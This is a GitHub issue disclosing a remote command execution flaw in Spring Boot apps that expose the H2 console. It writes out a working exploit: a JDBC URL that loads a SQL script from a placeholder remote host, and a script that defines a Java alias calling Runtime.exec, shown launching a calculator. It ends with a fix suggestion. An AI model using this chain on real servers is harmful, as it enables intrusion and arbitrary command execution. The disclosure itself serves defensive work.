New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Unsafe component h2 is referenced, causing ldap injection #2

Open

m4ra7h0n opened this issue Aug 15, 2023 · 0 comments

m4ra7h0n commented Aug 15, 2023 •

edited

url: http://host:ip/h2-console
driver Class: org.h2.Driver
JDBC URL: jdbc:h2:mem:dbtest;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://xxx/files/h2.sql'
and the h2.sql below

CREATE ALIAS shel1 As $$void shel1(String s) throws Exception {
  java.lang.Runtime.getRuntime().exec(s);
}$$;
SELECT shel1('open -a Calculator.app');

vulnable environment
spring Boot + H2
spring.h2.console.enabled=true
JDK < 6u201、7u191、8u182、11.0.1（LDAP）

修复建议：禁用h2-console enable，或者升级jdk版本

The text was updated successfully, but these errors were encountered:

m4ra7h0n changed the title ~~引用不安全组件h2~~ 引用不安全组件h2，导致ldap注入，命令执行

m4ra7h0n changed the title ~~引用不安全组件h2，导致ldap注入，命令执行~~ Unsafe component h2 is referenced, causing ldap injection

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment